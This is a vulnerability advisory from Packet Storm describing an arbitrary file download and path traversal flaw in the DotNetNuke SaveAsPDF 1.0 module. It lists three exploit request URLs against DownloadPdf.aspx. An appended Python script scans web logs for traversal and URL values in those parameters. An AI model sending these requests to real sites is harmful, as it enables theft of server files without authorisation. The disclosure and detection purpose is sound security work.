packetstorm | KingSkrupellos | PACKETSTORM:152052
Mar 11, 2019 - 12:00 a.m.

DotNetNuke SaveAsPDF 1.0 Arbitrary File Download

2019-03-11 00:00:00
KingSkrupellos
packetstormsecurity.com
`####################################################################  
  
# Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 12/03/2019  
# Vendor Homepage : bizmodules.net ~ dnnsoftware.com  
# Software Information Links :  
bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx  
bizmodules.net/portals/0/downloads/sap.pdf  
# Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Vulnerability Type :  
CWE-200 [ Information Exposure ]  
CWE-23 [ Relative Path Traversal ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke websites only.  
SAP is used to convert a DotNetNuke page to Adobe PDF format, including text, pictures and  
even Flash content.  
  
####################################################################  
  
# Impact :  
***********  
* DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download  
arbitrary files because the application fails to sufficiently sanitize user-supplied input.  
An attacker can exploit this issue to download arbitrary files within the context of the  
web server process and obtain potentially sensitive information. The issue also works as an  
open redirection vulnerability.  
  
* An information exposure is the intentional or unintentional disclosure of information to an  
actor that is not explicitly authorized to have access to that information.  
  
* The software uses external input to construct a pathname that should be within a restricted  
directory, but it does not properly neutralize sequences such as ".." that can resolve to a  
location that is outside of that directory.  
  
####################################################################  
  
# Arbitrary File Download Exploit :  
*******************************  
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov  
  
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]  
  
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]  
  
Note : It can download any random website as a PDF file to your computer, and  
it downloads system files from DNNSoftware.  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
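
For defenders, the request patterns listed under "Arbitrary File Download Exploit" can be hunted for in web server logs. The following is an added example, not part of the original advisory or the module's code: the endpoint and the `url`/`file` parameter names come from the advisory, while the log layout (IIS W3C style field order), the sample lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Endpoint and parameter names are taken from the advisory; matching is
# case-insensitive because the advisory shows both "url" and "Url".
ENDPOINT = "/desktopmodules/saveaspdf/downloadpdf.aspx"
WATCHED_PARAMS = {"url", "file"}

# Constructed sample lines in IIS W3C style (assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2019-03-12 10:01:07 203.0.113.5 GET /DesktopModules/SaveAsPDF/DownloadPdf.aspx Name=12&Url=..%2F..%2Fexample.txt 200
2019-03-12 10:01:09 203.0.113.5 GET /DesktopModules/SaveAsPDF/DownloadPdf.aspx url=https://www.example.org 200
2019-03-12 10:02:00 198.51.100.7 GET /DesktopModules/SaveAsPDF/DownloadPdf.aspx Name=12&file=report.pdf 200
2019-03-12 10:02:30 198.51.100.7 GET /Default.aspx tabid=188 200
2019-03-12 10:03:11 203.0.113.9 GET /desktopmodules/saveaspdf/downloadpdf.aspx Name=3&FILE=%252e%252e%255cexample.txt 404
"""

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded '..' is also seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(value):
    """Return a reason string if the parameter value looks suspicious."""
    v = decode_fully(value).replace("\\", "/")
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
        return "absolute-url"       # page fetch / redirect target
    if ".." in v.split("/"):
        return "path-traversal"     # CWE-23 style relative traversal
    if v.startswith("/") or re.match(r"^[a-z]:/", v, re.I):
        return "absolute-path"
    return None

def scan(log_text):
    """Yield (client_ip, param, reason) for each suspicious request."""
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[4].lower() != ENDPOINT:
            continue
        # Split the raw query by hand; classify() does its own decoding.
        for pair in fields[5].split("&"):
            name, _, raw = pair.partition("=")
            reason = classify(raw) if name.lower() in WATCHED_PARAMS else None
            if reason:
                yield fields[2], name, reason

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Adjust the field indexes in `scan` to match the `#Fields:` header of the logs being reviewed.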